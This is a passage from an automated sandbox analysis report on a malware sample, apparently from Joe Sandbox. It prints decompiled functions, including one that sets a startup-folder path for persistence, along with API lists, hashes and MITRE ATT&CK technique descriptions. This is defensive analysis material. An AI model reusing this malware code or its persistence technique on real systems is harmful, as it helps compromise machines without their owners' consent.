					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x460c40[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x460c44;
					while(1) {
						_t69 = E0045DE80(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x460d40 =  *0x460d40 + 0x20;
						__eflags =  *0x460d40;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x460d40 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x460d40; // 0x20
					goto L18;
				}
			}

APIs

GetStartupInfoA.KERNEL32(?), ref: 0045D067
GetFileType.KERNEL32(?,?,00000000), ref: 0045D112
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 0045D175
GetFileType.KERNEL32(00000000,?,00000000), ref: 0045D183
SetHandleCount.KERNEL32 ref: 0045D1BA

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: 243bc8d3b433b535eb0012521f37a877bbb3a2005efd5c068a84628679726580
Instruction ID: b3bd2de1173b64c844965d105ddb11b7d46c3fa228d1f44ebae3e601670f6dc0
Opcode Fuzzy Hash: 243bc8d3b433b535eb0012521f37a877bbb3a2005efd5c068a84628679726580
Instruction Fuzzy Hash: 9C512571D007418BC734CF68CC847667BA0AF1172AF24476EC996DB2E2E738984AC75A

Uniqueness

Uniqueness Score: -1.00%

Function 0045D22C, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045D22C() {
				void _t10;
				long _t15;
				void* _t16;

				_t15 = GetLastError();
				_t16 = TlsGetValue( *0x458c0c);
				if(_t16 == 0) {
					_t16 = E0045E375(1, 0x74);
					if(_t16 == 0 || TlsSetValue( *0x458c0c, _t16) == 0) {
						E0045C898(0x10);
					} else {
						E0045D219(_t16);
						_t10 = GetCurrentThreadId();
						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x0045d23a
0x0045d242
0x0045d246
0x0045d251
0x0045d257
0x0045d281
0x0045d26a
0x0045d26b
0x0045d271
0x0045d277
0x0045d27b
0x0045d27b
0x0045d257
0x0045d288
0x0045d292

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,0045FCAD,0045E680,00000000,?,?,00000000,00000001), ref: 0045D22E
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0045D23C
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0045D288

Part of subcall function 0045E375: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0045D251,00000001,00000074,?,?,00000000,00000001), ref: 0045E46B

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0045D260
GetCurrentThreadId.KERNEL32 ref: 0045D271

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 246f131815f1e20c34b41e9f6a4ac710abae5b6d5268bcbaafad0cd6967545d4
Instruction ID: ba693ec4ad11c64e8a10c2fd9ec3c2ec2f5f12fb3d8e0fd11b7d5ee20e409d53
Opcode Fuzzy Hash: 246f131815f1e20c34b41e9f6a4ac710abae5b6d5268bcbaafad0cd6967545d4
Instruction Fuzzy Hash: F4F096359053519BD7312B71BD0965A3B64DF017B3F10427AFD85B66B2CF38C88946A8

Uniqueness

Uniqueness Score: -1.00%

Function 0045F0E0, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045F0E0() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x458e80 != 0xffffffff) {
					_t43 = HeapAlloc( *0x460c28, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x458e70;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x458e70) {
							HeapFree( *0x460c28, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x458e70) {
						 *_t43 = 0x458e70;
						_t25 =  *0x458e74; // 0x458e70
						 *(_t43 + 4) = _t25;
						 *0x458e74 = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x458e70 == 0) {
							 *0x458e70 = 0x458e70;
						}
						if( *0x458e74 == 0) {
							 *0x458e74 = 0x458e70;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E0045FC50(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}

APIs

HeapAlloc.KERNEL32(00000000,00002020,00458E70,00458E70,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000), ref: 0045F101
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000), ref: 0045F125
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000), ref: 0045F13F
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000,?), ref: 0045F200
HeapFree.KERNEL32(00000000,00000000,?,?,0045F5AC,00000000,00000010,00000000,00000009,00000009,?,0045DF6A,00000010,00000000,?,00000000), ref: 0045F217

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 9504d2432e76de44d8a30c8fe1427842a5ca6af4fda3c03015bbda762a3f64df
Instruction ID: a0c64b51559a5c796b17c284b3697de23bf408b880b14a6f13410a1d098c5b96
Opcode Fuzzy Hash: 9504d2432e76de44d8a30c8fe1427842a5ca6af4fda3c03015bbda762a3f64df
Instruction Fuzzy Hash: 28310471540B01DBD3218F28DC45B26B6B0E754B66F10423AE955E7792DFB8AC4C8B4D

Uniqueness

Uniqueness Score: -1.00%

Function 0045CC8A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0045CC8A() {
				signed int _v8;
				char _v12;
				CHAR* _t14;
				intOrPtr _t27;
				CHAR* _t37;
				CHAR* _t40;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(_t33);
				_t46 =  *0x460d48; // 0x1
				if(_t46 == 0) {
					E0045DC7D();
				}
				_t40 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Ogxog.exe";
				GetModuleFileNameA(0, _t40, 0x104);
				_t14 =  *0x460d58; // 0x663448
				 *0x4606cc = _t40;
				_t37 = _t40;
				if( *_t14 != 0) {
					_t37 = _t14;
				}
				E0045CD23(_t37, 0, 0,  &_v8,  &_v12);
				_t41 = E0045DE80(_v12 + _v8 * 4);
				if(_t41 == 0) {
					E0045C898(8);
				}
				E0045CD23(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
				_t27 = _v8 - 1;
				 *0x4606b4 = _t41;
				 *0x4606b0 = _t27;
				return _t27;
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Ogxog.exe,00000104,?,00000000,?,?,?,?,0045C830), ref: 0045CCAD

Strings

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Ogxog.exe, xrefs: 0045CCA1, 0045CCAB, 0045CCD0, 0045CD06
H4f, xrefs: 0045CCB3

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleName
String ID: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Ogxog.exe$H4f
API String ID: 514040917-158378435
Opcode ID: 50c53521d81c47daecc90236341e5d438fe1cf6aa3ddea91ab6617209dc0c965
Instruction ID: 1c1e642ffd25bb10984e0f8b93a36713ce13c0e9cfab9480dd0ecfc158638fb1
Opcode Fuzzy Hash: 50c53521d81c47daecc90236341e5d438fe1cf6aa3ddea91ab6617209dc0c965
Instruction Fuzzy Hash: 0C114FB2900208AFD711EB95DDC1C9F77BCEB45359B10017AF905D7212E6B46E488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 0045EF34, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045EF34() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x4609f8; // 0x0
				_t26 =  *0x4609e8; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x4609fc; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x460c28, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x4609f8 =  *0x4609f8 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x460c28, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x460c28, 0,  *0x4609fc, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x4609e8 =  *0x4609e8 + 0x10;
				 *0x4609fc = _t25;
				_t15 =  *0x4609f8; // 0x0
				goto L3;
			}

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,0045ECFC,00000000,00000000,00000000,0045DF0C,00000000,00000000,?,00000000,00000000,00000000), ref: 0045EF5C
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,0045ECFC,00000000,00000000,00000000,0045DF0C,00000000,00000000,?,00000000,00000000,00000000), ref: 0045EF90
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0045EFAA
HeapFree.KERNEL32(00000000,?), ref: 0045EFC1

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 28e37a3ea8ead9a519e62383a7744047ba747b71d991be978f1a1d1f32382460
Instruction ID: 0a860bdffad66fa8c15086bd89fdb96649a9dd0b9e320e4b5754fb2e630511ec
Opcode Fuzzy Hash: 28e37a3ea8ead9a519e62383a7744047ba747b71d991be978f1a1d1f32382460
Instruction Fuzzy Hash: 211191B1201201EFE7648F2AEC45D277BB2FB443217214A3AF1A5D65B1E7F09989CF09

Uniqueness

Uniqueness Score: -1.00%

Function 0045D7C4, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045D7C4(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x458cfc);
				InitializeCriticalSection( *0x458cec);
				InitializeCriticalSection( *0x458cdc);
				InitializeCriticalSection( *0x458cbc);
				return _t1;
			}

0x0045d7c4
0x0045d7d1
0x0045d7d9
0x0045d7e1
0x0045d7e9
0x0045d7ec

APIs

InitializeCriticalSection.KERNEL32(?,0045D1CB,?,0045C800), ref: 0045D7D1
InitializeCriticalSection.KERNEL32(?,0045D1CB,?,0045C800), ref: 0045D7D9
InitializeCriticalSection.KERNEL32(?,0045D1CB,?,0045C800), ref: 0045D7E1
InitializeCriticalSection.KERNEL32(?,0045D1CB,?,0045C800), ref: 0045D7E9

Memory Dump Source

Source File: 00000002.00000002.512083381.000000000045A000.00000008.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.511840750.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.511851451.0000000000401000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512103517.0000000000460000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.512111155.0000000000461000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.512120322.0000000000462000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: af0b12ecfa4860e6e589f22cd847165de4c3ab99de7d2191986c1a962918db90
Instruction ID: ef4f378e49ee6049587b8f5ed066726ac4ae8cbdf93ba56c60c18ece843dc990
Opcode Fuzzy Hash: af0b12ecfa4860e6e589f22cd847165de4c3ab99de7d2191986c1a962918db90
Instruction Fuzzy Hash: 1BC00231916278AACF132B65FC0484A3F26FB443A2325807BF544721368E229C60EFE8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report OII9x4FeW7.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Code Manipulations

Function 0045C790, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
COMMON

Function 0045BD5A, Relevance: 64.7, APIs: 3, Strings: 40, Instructions: 189
memoryCOMMON

Function 0045F88E, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Function 0045DAF8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Function 0045BF74, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 107
memoryCOMMON

Function 0045D408, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Function 0045D8A5, Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Function 0045DEBE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Function 0045F704, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Function 0045FADD, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Function 0045D671, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Function 0045CED7, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Function 0045D2C0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Function 0045D009, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Function 0045D22C, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Function 0045F0E0, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMON

Function 0045CC8A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Function 0045EF34, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Function 0045D7C4, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Function 0045BD5A, Relevance: 64.7, APIs: 3, Strings: 40, Instructions: 189
memoryCOMMON

Function 0045F88E, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Function 0045C790, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
COMMON

Function 0045DAF8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Function 0045BF74, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 107
memoryCOMMON

Function 0045D408, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Function 0045D8A5, Relevance: 1.6, APIs: 1, Instructions: 143
COMMON

Function 0045DEBE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Function 0045F704, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Function 0045FADD, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Function 0045D671, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Function 0045CED7, Relevance: 12.1, APIs: 8, Instructions: 132
COMMON

Function 0045D2C0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Function 0045D009, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON